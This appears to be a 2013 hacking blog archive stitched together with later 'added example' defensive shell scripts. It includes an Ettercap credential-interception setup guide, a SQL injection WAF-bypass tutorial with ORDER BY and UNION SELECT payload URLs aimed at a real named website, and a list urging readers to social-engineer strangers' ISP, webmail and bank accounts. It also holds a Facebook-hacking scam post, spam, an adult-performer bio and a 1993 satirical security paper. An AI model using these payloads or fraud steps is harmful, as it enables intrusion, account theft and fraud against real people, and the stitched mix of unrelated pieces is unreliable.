Monday, 22 April 2013

Ettercap is by far one of the most powerful Security Tools to perform Communication Interception on both Local and Wireless Networks.
A few days ago, Version 0.7.5 was released, introducing three new and exciting features:
1. SSL Password Interception. Captures user credentials from secure web portals such as Facebook, Yahoo, Hotmail and Gmail. This technique is based on the "Sslstrip" tool.
2. IPv6 Support. With this feature, we can now perform security tests over this network generation, giving us new and exciting Ethical Hacking opportunities.
3. NBNS Spoofing. Steals the identity of any network device or service, as long as it is based on NetBIOS name resolution. This attack is very useful on Windows Networks and Samba servers. It can also be used to attack other technologies such as SAN and NAS.
As Security Experts, we need to stay at the cutting edge of our field, testing new attack tools and their capabilities as soon as they become available.
Unfortunately, Ettercap's installation procedure is very poorly documented. Despite my amazing Google Powers, I have not found any useful Internet tutorial. To make things worse, even the great BackTrack distribution does not include the new version.
Furthermore, I really doubt we'll see the new version on Ubuntu's software repositories any time soon. Ettercap authors strongly recommend using "development" libraries, which are considered "unstable" for most production environments.
To solve the conundrum, I decided to write this tutorial, explaining a detailed installation procedure for Ettercap on Ubuntu 12.04. Of course, a rookie Hacker might say "I'll just install it on Windows! Problem solved!".
Well, if you are one of these rookies, I have bad news for you. Installing it on Windows is extremely easy. However, this platform does not support the new SSL attack!
So, with this Tutorial, I'm going to help you become one of the first Ethical Hackers in the whole Universe with the knowledge and power to use the new Ettercap awesome features.
INSTALLATION PROCEDURE
1. Installing Dependencies
Ettercap requires a lot of software libraries not usually available on a standard Ubuntu system. To install them, just open a terminal and run the following commands:
apt-get install -y cmake cmake-curses-gui
apt-get install -y libgtk2.0-dev libnet1-dev flex build-essential
apt-get install -y linux-headers-`uname -r` libpcre3-dev libpcap0.8-dev openssl
apt-get install -y libssl-dev ncurses-bin libncurses5-dev libnet6-1.3-dev libpthread-stubs0-dev
apt-get install -y zlib1g-dev libltdl-dev pango-graphite pkg-config libpango1.0-dev
apt-get install -y libatk1.0-dev libgtk2.0-dev autoconf byacc
(To accelerate the installation, open this tutorial in your browser and just copy-paste the instructions on your terminal, instead of entering them manually).
2. Sslstrip support. This new feature requires a recent libcurl library version, not yet available in Ubuntu's repositories. So, we need to install it from source. Run the following commands:
cd /usr/src
wget http://curl.haxx.se/download/curl-7.28.0.tar.gz
tar xvfz curl-7.28.0.tar.gz
cd curl-7.28.0
./configure
make
make install
In this tutorial, I'm using /usr/src as destination folder, feel free to use whatever you want.
To make sure Ettercap finds the new library, open the /etc/ld.so.conf file. Add /usr/local/lib at the end. Save the file and run ldconfig to complete the installation.
2. IPv6 Support. This new feature requires a recent libnet library version, not yet available in Ubuntu's repositories. Again, we are going to install it from source. Go to http://sourceforge.net/projects/libnet-dev/ and download the libnet-1.1.6.tar.gz file to any folder. In this tutorial, I'm using /usr/src
Run the following commands from your terminal:
cd /usr/src
tar xvfz libnet-1.1.6.tar.gz
cd libnet-1.1.6
./configure
make
make install
ldconfig
3. Ettercap Installation. Open http://sourceforge.net/projects/ettercap in your browser. Download ettercap-0.7.5.tar.gz to any folder.
In this tutorial, I use /hack/network/mitm (I install all my "Man in The Middle" attack tools in this folder, hence the name. Of course, you can choose any other folder).
Run the following commands in your terminal:
cd /hack/network/mitm
tar xvfz ettercap-0.7.5.tar.gz
cd ettercap-0.7.5
mkdir build
cd build
cmake ..
ccmake ..
You'll see the following screen:
Change the following fields, with the indicated values:
ENABLE_IPV6 ON
FOUND_LIBCURL /usr/local/lib/libcurl.so
HAVE_LIBNET /usr/local/lib/libnet.so
Press Enter after modifying each field, press "c" to return to configuration mode, and finally "g" to save the changes and exit. Finish Ettercap's installation by running the following commands:
make
make install
SSLSTRIP CONFIGURATION
1. Sslstrip capability requires root privileges to make some temporary changes to the local firewall. To grant them, open Ettercap's configuration file /etc/ettercap/etter.conf. Modify the text at line 17, so it reads ec_uid = 0.
2. Delete the # comment character from lines 171 and 172. These are firewall modifications required by Sslstrip, used only while Ettercap is running. Don't worry, they are just network traffic redirection instructions and do not jeopardize your firewall integrity in any way.
Save the etter.conf file.
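Line numbers such as 17, 171 and 172 may differ between versions of the file, so it is safer to check these settings by key name. The script below is an added example, not part of Ettercap or of the original tutorial: it reports whether an etter.conf has ec_uid set to 0 and active redir_command_on / redir_command_off lines, which helps confirm after a test session that the file is back in its stock state. Both sample files are constructed and assume the stock file ships with ec_uid = 65534 and the redirect lines commented out.

```sh
#!/bin/sh
# Added example: inspect an etter.conf by key name instead of by line number.

# Value on the last active (uncommented) ec_uid line, e.g. "0" or "65534".
ec_uid_value() {
    sed -n 's/^[[:space:]]*ec_uid[[:space:]]*=[[:space:]]*\([0-9][0-9]*\).*/\1/p' "$1" | tail -n 1
}

# Number of active redir_command_on / redir_command_off lines.
active_redirects() {
    grep -c -E '^[[:space:]]*redir_command_(on|off)[[:space:]]*=' "$1" || true
}

# "edited" = both tutorial changes present, "partial" = only one, "stock" = neither.
conf_state() {
    [ -r "$1" ] || { echo "unreadable"; return 0; }
    uid=$(ec_uid_value "$1")
    redirs=$(active_redirects "$1")
    if [ "$uid" = "0" ] && [ "$redirs" -ge 2 ]; then
        echo "edited"
    elif [ "$uid" = "0" ] || [ "$redirs" -gt 0 ]; then
        echo "partial"
    else
        echo "stock"
    fi
}

# Constructed samples in the style of etter.conf (assumed layout, not a real install).
write_samples() {
    cat > "$1/edited.conf" <<'EOF'
[privs]
ec_uid = 0                # nobody is the default
ec_gid = 65534
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
EOF
    cat > "$1/stock.conf" <<'EOF'
[privs]
ec_uid = 65534            # nobody is the default
ec_gid = 65534
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
EOF
}

demo_dir=$(mktemp -d)
write_samples "$demo_dir"
for f in "$demo_dir/edited.conf" "$demo_dir/stock.conf"; do
    echo "${f##*/}: ec_uid=$(ec_uid_value "$f") redirects=$(active_redirects "$f") state=$(conf_state "$f")"
done
# Real use: conf_state /etc/ettercap/etter.conf
```

With ec_uid = 0 Ettercap keeps root privileges for the whole session instead of dropping to an unprivileged user, so a result other than "stock" outside a test session is worth reverting.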
ETTERCAP TESTING
Run the following command:
ettercap -G
If everything works as expected, you'll see the following screen:
Congratulations! You are now one of the first and proud Ethical Hackers in the whole Universe to test the new and powerful Ettercap!
Now go have a drink... You know you deserve it.

Thursday, 4 April 2013

Itz COST Free but not EFFORT Free ;)
Now u can get your free domain name at
www.freedomainfactory.com
OR
www.freepremiumdomain.com

All u have to do is Sign Up....invite your friends thru your referral link and complete surveys to earn points..DATZ IT!!

Wednesday, 3 April 2013

Common Problem
(Still No Error in order by 10000--)

The first thing to do when a website is vulnerable to SQL injection is to check
the number of columns the vulnerable query returns.
Already tried an ORDER BY test with 10000 columns but still got no error?
Having problems finding the number of columns?
The reason is that the request is blocked by the WAF, but here is a method to bypass it.

Example Vuln:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10'

Example:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10+order+by+10000--

A small site like this cannot have 10000 columns, so getting no error with that number means the ORDER BY is not taking effect. :)
To bypass this, you have to add ' after the id parameter value and also put + at the end.

So you will have something like this.. :)
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10%27+order+by+10000--+

NOTE
YOU STILL HAVE TO CONTINUE USING THE ' AND + AS YOU CONTINUE LIKE THIS.
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10' union select 1,2,3,4,5,6,7,8,9,10,11,12--+

HOPE YOU ENJOY THE TUTORIAL!
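
Seen from the server side, the ORDER BY and UNION SELECT probes described in this post leave a recognisable trace in the web server's access log. The script below is an added example, not part of the original post: it normalises the encodings used above ("+", %20, %27) and flags matching requests. The log lines, the /detail.php path and the client addresses are constructed for the demonstration.

```sh
#!/bin/sh
# Added example: flag the column-count probes from this post in a web access log.

# Lower-case a request target and undo the encodings seen in the post:
# "+" and %20 become a space, %27 becomes a single quote.
decode_target() {
    printf '%s\n' "$1" | awk '{
        q = tolower($0)
        gsub(/[+]|%20/, " ", q)
        gsub(/%27/, "\047", q)
        print q
    }'
}

# Classify one request target: "union-select", "order-by-probe" or "clean".
classify_request() {
    q=$(decode_target "$1")
    if printf '%s\n' "$q" | grep -Eq 'union +(all +)?select'; then
        echo "union-select"
    elif printf '%s\n' "$q" | grep -Eq 'order +by +[0-9]+'; then
        echo "order-by-probe"
    else
        echo "clean"
    fi
}

# Read combined-format log lines on stdin; print "client verdict decoded-target" per hit.
scan_log() {
    while read -r ip ident user ts tz method target rest; do
        verdict=$(classify_request "$target")
        [ "$verdict" = "clean" ] || printf '%s %s %s\n' "$ip" "$verdict" "$(decode_target "$target")"
    done
}

# Constructed sample log (documentation address ranges, hypothetical paths).
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [03/Apr/2013:10:00:01 +0000] "GET /detail.php?idp=10 HTTP/1.1" 200 5120
198.51.100.7 - - [03/Apr/2013:10:00:05 +0000] "GET /detail.php?idp=10+order+by+10000-- HTTP/1.1" 200 5120
198.51.100.7 - - [03/Apr/2013:10:00:09 +0000] "GET /detail.php?idp=10%27+order+by+10000--+ HTTP/1.1" 200 812
198.51.100.7 - - [03/Apr/2013:10:00:14 +0000] "GET /detail.php?idp=10%27+union+select+1,2,3--+ HTTP/1.1" 200 5300
192.0.2.44 - - [03/Apr/2013:10:01:30 +0000] "GET /list.php?sort=name&order=asc HTTP/1.1" 200 2048
EOF
}

sample_log | scan_log
```

A hit in the log only shows that probing took place; the fix is still a parameterised query in the page that reads idp.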

How to Become a Hacker:




1. Learn TCP/IP, basic information gathering, proxies, SOCKS, SSL, VPN, VPS, RDP, FTP, POP3, SMTP, Telnet, SSH.

2. Learn Linux, Unix, Windows - you can do this using vmware or any virtual desktop utility.

3. Learn a programming language that's compatible with all OS - Perl, Python, C.

4. Learn HTML, PHP, Javascript, ASP, XML, SQL, XSS, SQLI, RFI, LFI.

5. Learn reverse engineering and crack some programs for serials, easy ones like mirc, winzip, winrar or old games.

6. Code a fuzzer for common protocols - ftp, pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble.

7. Code a tool that uses grep to sort out unique code in source codes.

8. Make a custom IPtable, IPsec firewall that blocks all incoming traffic and outgoing traffic and add filters to accept certain ports that your software or scripts use.

9. Pick a kernel in linux or unix, also pick a Microsoft OS version, let's say Winxp pro sp2, put them on the virtual desktops (vmware) and find and code a new local exploit in those versions, then install an Apache webserver on the Linux/Unix and an IIS webserver on the winxp pro and attempt to find and code a new local reverse_tcp_shell exploit.

10. Learn Cisco Router and Switch configuration and setup.

11. Learn Checkpoint Setup and Config.

12. Learn Wifi scanning, cracking, sniffing.

13. Pick a person in your phonebook for the area code you live in or city, then ring the person on an anonymous line like skype or a payphone or a carded sim and attempt to social engineer the person for his name, address, date of birth, city born, country born, ISP connected with, phone company connected with, what bank he/she uses and anything else you can get. Then attempt to ring using a spoof caller ID software with the person's phone number - call the ISP and try to reset the password to his/her internet connection/webmail, get access to bank account or ask them to send out a new *** to a new address (drop) with a new pin, reset of phone company passwords.

14. Use your information gathering skills to get all the information off a website like a shop, then use the spoof callerID software or hack your phone to show a new number of the Webserver's Tech Support number, then ring the shop owner and try to get the shop site password.

15. Do the same thing but attempt to use a web attack against a site or shop to gain admin access.

16. Once you have access, upload a shell and attempt to exploit the server to gain root using an exploit you coded, not someone else's exploit.

17. Make your own Linux Distro.

18. Use your own Linux Distro or use a vanilla Linux gnome (not kde), keep it with not much graphics so you can learn how to depend on the terminal, and start from scratch: install applications that you will only need for a blackbox (Security test box), make folders for fuzzers, exploits, scanners, etc. Then load them up with your own scripts and other tools (by this stage you shouldn't need to depend on other people's scripts).

19. Learn macosx and attempt to gain access to a Macosx box, whether it be your own or someone else's.

20. Create a secure home network and secure your own systems with your own Security policies and firewall settings.

All this isn't an overnight learning; it will take a nice 3 - 4 years to learn a bit of this, 5+ years to learn most of it, and even then you may need time to keep learning as IT keeps changing every day.

Monday, 1 April 2013


Aletta Ocean (born December 14, 1987) is a Hungarian pornographic actress.[1] Ocean began modeling in 2006 after winning a beauty contest. She started pornography in 2007, taking the plunge timidly at first, pushed into it by her boyfriend at the time. Six months later, she had decided to make a job of it. She quit her studies as the news of her professional activity on the side had become known. In 2009 she also spent five months shooting in the USA. She received a nomination in the 11th Hot d'Or, the French pornographic awards, in the category of Best European Starlet.
She has modeled for the likes of Penthouse and Hungarian Playboy. She won the 2010 AVN Awards for Female Foreign Performer of the Year and Best Sex Scene in a Foreign-Shot Production (Dolls House).[2] Ocean has appeared in nearly 180 pornographic films.[3]

Sunday, 31 March 2013

hack facebook PAssWOrd In EASy STepS:

1)use google

2)type http://www.hackfacebookpassword.com/

3)type the complete address  of the person whose id you want to be hacked

4)NOw CLiCk on REtrieVe paSSword

5)unlock premium account and access the password


        A Guide to Internet Security: Becoming an Uebercracker
        and Becoming an UeberAdmin to stop Uebercrackers.


Author: Christopher Klaus <cklaus@shadow.net>
Date: December 5th, 1993.
Version: 1.1

  This paper will be broken into two parts, one showing 15 easy steps
to becoming a uebercracker and the next part showing how to become a
ueberadmin and how to stop a uebercracker.  A uebercracker is a term phrased
by Dan Farmer to refer to some elite (cr/h)acker that is practically
impossible to keep out of the networks.

Here's the steps to becoming a uebercracker.

Step 1. Relax and remain calm. Remember YOU are a Uebercracker.

Step 2. If you know a little Unix, you are way ahead of the crowd and skip
past step 3.

Step 3. You may want to buy Unix manual or book to let you know what
ls,cd,cat does.

Step 4. Read Usenet for the following groups: alt.irc, alt.security,
comp.security.unix.  Subscribe to Phrack@well.sf.ca.us to get a background
in uebercracker culture.

Step 5. Ask on alt.irc how to get and compile the latest IRC client and
connect to IRC.

Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way
there!)

Step 7. Now, sit on #hack and send messages to everyone in the channel
saying "Hi, Whats up?". Be obnoxious to anyone else that joins and asks
questions like "Why cant I join #warez?"

Step 8. (Important Step) Send private messages to everyone asking for new
bugs or holes. Here's a good pointer, look around your system for binary
programs suid root (look in Unix manual from step 3 if confused). After
finding a suid root binary, (ie. su, chfn, syslog), tell people you have a
new bug in that program and you wrote a script for it.  If they ask how it
works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask
them to trade for their get-root scripts.

Step 9. Make them send you some scripts before you send some garbage file
(ie. a big core file). Tell them it is encrypted or it was messed up and
you need to upload your script again.

Step 10. Spend a week grabbing all the scripts you can. (Dont forget to be
obnoxious on #hack otherwise people will look down on you and not give you
anything.)

Step 11. Hopefully you will now have at least one or two scripts that get
you root on most Unixes. Grab root on your local machines, read your
admin's mail, or even other user's mail, even rm log files and whatever
tempts you. (look in Unix manual from step 3 if confused).

Step 12. A good test for true uebercrackerness is to be able to fake mail.
Ask other uebercrackers how to fake mail (because they have had to pass the
same test). Email your admin how "layme" he is and how you got root and how
you erased his files, and have it appear coming from satan@evil.com.

Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag
about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are
a uebercracker.)

Step 14. Wait a few months and have all your notes, etc ready in your room
for when the FBI, Secret Service, and other law enforcement agencies
confiscate your equipment. Call eff.org to complain how you were innocent
and how you accidentally gotten someone else's account and only looked
because you were curious. (Whatever else that may help, throw at them.)

Step 15. Now for the true final supreme eliteness of all uebercrackers, you
go back to #hack and brag about how you were busted.  YOU are finally a
true Uebercracker.


Now the next part of the paper is top secret.  Please only pass to trusted
administrators and friends and even some trusted mailing lists, Usenet
groups, etc. (Make sure no one who is NOT in the inner circle of security
gets this.)

This is broken down on How to Become an UeberAdmin (otherwise known as a
security expert) and How to stop Uebercrackers.

Step 1. Read Unix manual ( a good idea for admins ).

Step 2. Very Important.  chmod 700 rdist; chmod 644 /etc/utmp. Install
sendmail 8.6.4.  You have probably stopped 60 percent of all Uebercrackers
now.  Rdist scripts is among the favorites for getting root by
uebercrackers.

Step 3. Okay, maybe you want to actually secure your machine from the
elite Uebercrackers who can break into any site on Internet. 

Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
packets. (This only applies to advanced admins who have control of the
router, but this will stop 90% of all uebercrackers from attempting your
site.)

Step 5. Apply all CERT and vendor patches to all of your machines. You have
just now killed 95% of all uebercrackers.

Step 6. Run a good password cracker to find open accounts and close them.
Run tripwire after making sure your binaries are untouched. Run tcp_wrapper
to find if a uebercracker is knocking on your machines.  Run ISS to make
sure that all your machines are reasonably secure as far as remote
configuration (ie. your NFS exports and anon FTP site.)

Step 7. If you have done all of the following, you will have stopped 99%
of all uebercrackers. Congrads! (Remember, You are the admin.) 

Step 8. Now there is one percent of uebercrackers that have gained
knowledge from reading some security expert's mail (probably gained access
to his mail via NFS exports or the guest account.  You know how it is, like
the mechanic that always has a broken car, or the plumber that has the
broken sink, the security expert usually has an open machine.) 

Step 9. Here is the hard part is to try to convince these security experts
that they are not so above the average citizen and that by now giving out
their unknown (except for the uebercrackers) security bugs, it would be a
service to Internet.  They do not have to post it on Usenet, but share
among many other trusted people and hopefully fixes will come about and
new pressure will be applied to vendors to come out with patches.

Step 10.  If you have gained the confidence of enough security experts,
you will now be looked up to as an elite security administrator that is
able to stop most uebercrackers.  The final true test for being a ueberadmin
is to compile a IRC client, go onto #hack and log all the bragging and
help catch the uebercrackers. If a uebercracker does get into your system,
and he has used a new method you have never seen, you can probably tell
your other security admins and get half of the replies like - "That bug
been known for years, there just isn't any patches for it yet. Here's my
fix." and the other half of the replies will be like - "Wow.  That is very
impressive. You have just moved up a big notch in my security circle."
VERY IMPORTANT HERE:  If you see anyone in Usenet's security newsgroups
mention anything about that security hole, Flame him for discussing it
since it could bring down Internet and all Uebercrackers will now have it
and the million other reasons to keep everything secret about security.


Well, this paper has shown the finer details of security on Internet. It has
shown both sides of the coin.  Three points I would like to make that would
probably clean up most of the security problems on Internet are as the
following:

1.  Vendors need to make security a little higher than zero in priority.
If most vendors shipped their Unixes already secure with most known bugs
that have been floating around since the Internet Worm (6 years ago) fixed
and patched, then most uebercrackers would be stuck as new machines get
added to Internet.  (I believe Uebercracker is german for "lame copy-cat
that can get root with 3 year old bugs.") An interesting note is that
if you probably check the mail alias for "security@vendor.com", you will
find it points to /dev/null.  Maybe with enough mail, it will overfill
/dev/null.  (Look in manual if confused.)

2.  Security experts giving up the attitude that they are above the normal
Internet user and try to give out information that could lead to pressure
by other admins to vendors to come out with fixes and patches.  Most
security experts probably don't realize how far their information has
already  spread.

3.  And probably one of the more important points is just following the
steps I have outlined for Stopping a Uebercracker.


Resources for Security:
   Many security advisories are available from anonymous ftp cert.org.
Ask archie to find tcp_wrapper, security programs.  For more information
about ISS (Internet Security Scanner), email cklaus@shadow.net.


Acknowledgements: 

   Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
Miles, Scott Yelich, and Henri De Valois.


Copyright:

This paper is Copyright 1993, 1994.  Please distribute to only trusted
people.  If you modify, alter, disassemble, reassemble, re-engineer or have
any suggestions or comments, please send them to:

cklaus@shadow.net
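
Step 2 of the UeberAdmin list names two permission problems: a set-user-ID rdist and a world-writable /etc/utmp. The script below is an added example, not part of Klaus's paper: it generalises that check to any directory tree and shows the paper's two chmod commands clearing both findings on constructed stand-in files. The fixture layout and the 4755/666 starting modes are assumptions made for the demonstration.

```sh
#!/bin/sh
# Added example: find the two conditions that Step 2's chmod commands remove.

# Regular files under DIR with the set-user-ID bit (cleared by "chmod 700 rdist").
list_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Regular files under DIR that any user may write (cleared by "chmod 644 /etc/utmp").
list_world_writable() {
    find "$1" -xdev -type f -perm -0002 2>/dev/null | sort
}

# One line per finding: "<kind> <path>". No output means nothing was found.
report() {
    list_setuid "$1" | sed 's/^/setuid /'
    list_world_writable "$1" | sed 's/^/world-writable /'
}

# Constructed stand-ins for the paper's two files; nothing outside DIR is touched.
make_fixture() {
    mkdir -p "$1/bin" "$1/etc"
    : > "$1/bin/rdist"; chmod 4755 "$1/bin/rdist"   # set-user-ID (assumed starting mode)
    : > "$1/bin/ls";    chmod 755  "$1/bin/ls"      # ordinary binary, should not be reported
    : > "$1/etc/utmp";  chmod 666  "$1/etc/utmp"    # world-writable (assumed starting mode)
}

# The paper's Step 2, applied to the fixture copies.
apply_step2() {
    chmod 700 "$1/bin/rdist"
    chmod 644 "$1/etc/utmp"
}

fixture=$(mktemp -d)
make_fixture "$fixture"
echo "before Step 2:"; report "$fixture"
apply_step2 "$fixture"
echo "after Step 2:";  report "$fixture"
# Real use: report /usr   (run as root so every directory can be read)
```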